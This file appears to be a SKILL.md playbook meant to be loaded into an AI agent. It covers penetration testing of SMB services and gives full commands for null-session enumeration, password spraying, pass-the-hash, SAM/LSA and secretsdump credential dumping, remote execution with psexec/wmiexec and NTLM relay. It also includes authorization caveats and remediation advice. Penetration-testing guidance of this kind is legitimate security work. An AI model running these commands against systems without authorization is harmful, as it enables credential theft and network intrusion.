pentesting-smb
$
npx mdskill add xalgord/xalgorix/pentesting-smb- During authorized internal network or Active Directory penetration tests when TCP 445 or 139 is open - When you need to enumerate shares, users, groups, and the domain password policy - When testing for anonymous/null sessions, guest access, and default credentials - When you have credentials (or NT hashes) and want to access shares, dump secrets, or move laterally - When assessing Samba servers on Linux/Unix for dangerous `smb.conf` misconfigurations
SKILL.md
.github/skills/pentesting-smbView on GitHub ↗
---
name: pentesting-smb
description: Testing SMB/CIFS file-sharing services (TCP 445, and 139 over NetBIOS) on Windows and Samba hosts during
authorized engagements. Covers share enumeration, null/guest session abuse, user and RID enumeration, credentialed
access with netexec/crackmapexec, password spraying, command execution (psexec/wmiexec/smbexec/atexec), SAM/LSA
dumping, and notable CVEs such as EternalBlue (MS17-010).
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- smb
- cifs
- active-directory
- lateral-movement
version: '1.0'
author: xalgorix
license: Apache-2.0
---
# Pentesting SMB (port 445/139)
## When to Use
- During authorized internal network or Active Directory penetration tests when TCP 445 or 139 is open
- When you need to enumerate shares, users, groups, and the domain password policy
- When testing for anonymous/null sessions, guest access, and default credentials
- When you have credentials (or NT hashes) and want to access shares, dump secrets, or move laterally
- When assessing Samba servers on Linux/Unix for dangerous `smb.conf` misconfigurations
## Quick Enumeration
```bash
# Version and vuln scan (also fingerprints OS)
nmap --script "safe or smb-enum-*" -p 445 <IP>
nmap --script smb-os-discovery,smb-security-mode,smb2-security-mode -p 445 <IP>
nmap --script smb-vuln-ms17-010 -p 445 <IP> # EternalBlue check
# Full enumeration via null/anon IPC$ session
enum4linux -a <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
# netexec / crackmapexec (the modern workhorse)
netexec smb <IP> # banner, signing, domain, OS
crackmapexec smb <IP> -u '' -p '' --shares # null session shares
crackmapexec smb <IP> -u 'guest' -p '' --shares # guest session shares
# rpcclient null session
rpcclient -U "" -N <IP>
```
## Critical: Checks Most Often Missed
1. **Null / anonymous session on IPC$** — connect with empty user and password. Often still yields OS info, parent domain, users, groups, shares, and the password policy via `enum4linux`/`enum4linux-ng`.
2. **Guest account access** — guest with a blank password frequently lists shares even when null does not.
3. **SMB signing not required** — enables SMB relay (NTLM relay) attacks. `netexec smb <IP>` reports `signing:False`.
4. **EternalBlue (MS17-010)** — unpatched SMBv1 remote code execution. Confirm with `nmap --script smb-vuln-ms17-010` or `crackmapexec smb <IP> -M ms17-010`. Do NOT run the exploit without explicit written authorization; the kernel pool overflow can crash the host.
5. **Readable SYSVOL/NETLOGON** — readable by all authenticated domain users. Hunt for `Registry.xml` (GPP autologon passwords), `web.config`, and logon scripts with embedded creds. Also test write access even on "read-only"-looking shares (NTFS ACLs may allow writes → logon-script poisoning).
6. **NTFS vs share ACL mismatch** — a share that looks read-only may still allow file writes. Always test by uploading a small file.
How to CONFIRM: a null session is confirmed when `smbclient -U '%' -N \\\\<IP>\\IPC$ -c ''` returns no error, or `crackmapexec smb <IP> -u '' -p '' --shares` lists shares. Treat `NT_STATUS_ACCESS_DENIED` as "share exists, no access" and `NT_STATUS_BAD_NETWORK_NAME` as "share does not exist."
## Workflow
### Step 1: Enumerate (shares, users, domain info)
```bash
# Shares (try null, then guest, then creds)
smbclient --no-pass -L //<IP> # null user
smbmap -H <IP> # null user, shows perms
crackmapexec smb <IP> -u '' -p '' --shares
# Users / groups / password policy
crackmapexec smb <IP> --users [-u <user> -p <pass>]
crackmapexec smb <IP> --groups [-u <user> -p <pass>]
crackmapexec smb <IP> -u <user> -p <pass> --pass-pol
rpcclient -U "" -N <IP> -c 'enumdomusers'
rpcclient -U "" -N <IP> -c 'enumdomgroups'
# RID cycling / SID lookup to recover usernames
lookupsid.py -no-pass <DOMAIN>/@<IP>
crackmapexec smb <IP> -u 'guest' -p '' --rid-brute
```
### Step 2: Authenticate (null session, default creds, password spray)
```bash
# Default / weak creds worth trying: blank, guest/blank, admin/(blank|password|admin)
# Validate a single credential pair
crackmapexec smb <IP> -u 'user' -p 'Password1' # (+) = valid, Pwn3d! = admin
# Password spray across a user list (mind lockout policy!)
crackmapexec smb <IP> -u users.txt -p 'Spring2024!' --continue-on-success
# Pass-the-Hash
crackmapexec smb <IP> -u Administrator -H <NTHASH>
smbmap -u "username" -p "<NT>:<LM>" -H <IP> # PtH with smbmap
# Kerberos auth (NTLM disabled environments → STATUS_NOT_SUPPORTED)
sudo ntpdate <dc.fqdn> # avoid KRB_AP_ERR_SKEW
netexec smb <dc.fqdn> -k # use ccache TGT
smbclient --kerberos //ws01.domain.com/C$
```
### Step 3: Exploit / Extract (share access, secrets dumping)
```bash
# Connect to a share and pull files
smbclient --no-pass //<IP>/<Share>
smbclient //<IP>/<share> -c 'recurse; prompt; mget *' # download everything
smbmap -R <Share> -H <IP> -A '<FileName>' -q # search + download
# Try common hidden shares
smbclient -U '%' -N \\\\<IP>\\ADMIN$ # also C$, IPC$, SYSVOL, NETLOGON
# Spider shares for secrets
crackmapexec smb <IP> -u user -p pass -M spider_plus --share 'Department Shares'
# Dump credentials with valid (admin) creds
crackmapexec smb <IP> -u Administrator -p 'pass' --sam # local SAM hashes
crackmapexec smb <IP> -u Administrator -p 'pass' --lsa # LSA secrets
secretsdump.py [[domain/]username[:password]@]<IP> # impacket full dump
# Remote registry read
reg.py domain.local/USERNAME@<IP> -hashes <LM:NT> query -keyName HKLM -s
```
### Step 4: Post-access / lateral movement
```bash
# Command execution (wmiexec = default for CME; fileless options)
crackmapexec smb <IP> -u Administrator -p 'pass' -x whoami
crackmapexec smb <IP> -u Administrator -H <NTHASH> -x whoami
# --exec-method {mmcexec,smbexec,atexec,wmiexec}
# Impacket interactive shells (kali: /usr/share/doc/python3-impacket/examples/)
psexec.py [[domain/]username[:password]@]<IP> # new service via \pipe\svcctl
wmiexec.py [[domain/]username[:password]@]<IP> # DCOM via port 135, fileless
smbexec.py [[domain/]username[:password]@]<IP> # cmd/powershell via service
atexec.py [[domain/]username[:password]@]<IP> "whoami" # Task Scheduler \pipe\atsvc
# All support -hashes <LM:NT> for PtH and -k for Kerberos
# SMB relay (when signing not required) — capture + relay NTLM
ntlmrelayx.py -tf targets.txt -smb2support
```
## Key Concepts
| Concept | Description |
|---------|-------------|
| **SMB / CIFS** | Application-layer protocol for shared access to files, printers, and named pipes; runs on TCP 445 (direct) or 139 (NetBIOS) |
| **Null session** | Anonymous IPC$ connection with empty username/password; exposes services over named pipes |
| **IPC$** | Inter-process communication share used to interact with named pipes (lsarpc, samr, srvsvc) |
| **Pass-the-Hash (PtH)** | Authenticating with an NT hash instead of a cleartext password |
| **SMB signing** | Integrity protection; when not required, NTLM relay attacks become possible |
| **RID cycling** | Enumerating users by brute-forcing relative IDs (500–~1100) via SID lookups |
| **SYSVOL/NETLOGON** | Domain shares readable by authenticated users; common source of GPP/script credentials |
| **EternalBlue (MS17-010)** | SMBv1 kernel pool overflow giving unauthenticated remote code execution |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nmap** (smb-* NSE) | Version detection, security mode, MS17-010 vuln check |
| **netexec / crackmapexec** | Share/user/group enum, spraying, PtH, secrets dump, command exec |
| **enum4linux-ng** | Aggregated null-session enumeration (OS, domain, users, shares, policy) |
| **rpcclient** | Manual MSRPC queries (enumdomusers, enumdomgroups, queryuser) |
| **smbclient / smbmap** | Share listing, file transfer, recursive search and download |
| **impacket** | psexec/wmiexec/smbexec/atexec, secretsdump, samrdump, lookupsid, reg, ntlmrelayx |
| **Snaffler / ShareHound** | Automated discovery of sensitive files and share ACLs across the domain |
## Common Scenarios
### Scenario 1: Anonymous Enumeration
A host allows null sessions. `enum4linux-ng -A <IP>` reveals the domain name, full user list, group memberships, and password policy — providing a user list for targeted password spraying.
### Scenario 2: GPP Password in SYSVOL
A domain user can read `\\<dc>\SYSVOL\<domain>\Policies\...\Registry.xml` containing an autologon password configured via Group Policy, granting workstation access.
### Scenario 3: Pass-the-Hash Lateral Movement
A dumped local Administrator NT hash is reused across the subnet. `crackmapexec smb <subnet> -u Administrator -H <hash>` flags hosts as `Pwn3d!`, and `wmiexec.py -hashes :<hash> Administrator@<IP>` yields a shell.
### Scenario 4: EternalBlue Target
`nmap --script smb-vuln-ms17-010` flags an unpatched server. With written authorization, the host is exploited for SYSTEM-level RCE; otherwise it is reported as a critical finding only.
## Output Format
```
## SMB Finding
**Service**: SMB/CIFS
**Severity**: <Critical|High|Medium|Low>
**Host**: <IP>:445
**Access Level**: <null | guest | authenticated | admin>
### Summary
<What was found: null session, weak creds, MS17-010, exposed share, etc.>
### Evidence
- Command: <exact command run>
- Output: <relevant signature, e.g. share list, "Pwn3d!", root: line, MS17-010 VULNERABLE>
### Affected Resources
| Share / Object | Access | Notable Contents |
|----------------|--------|------------------|
| SYSVOL | read | Registry.xml with GPP password |
| C$ | read/write (admin) | full filesystem |
### Reproduction Steps
1. <step>
2. <step>
### Recommendation
1. Disable null/anonymous sessions and the guest account
2. Require SMB signing on all hosts
3. Patch MS17-010 / disable SMBv1
4. Remove credentials from SYSVOL scripts and GPP; rotate exposed secrets
5. Enforce strong, unique local administrator passwords (LAPS)
```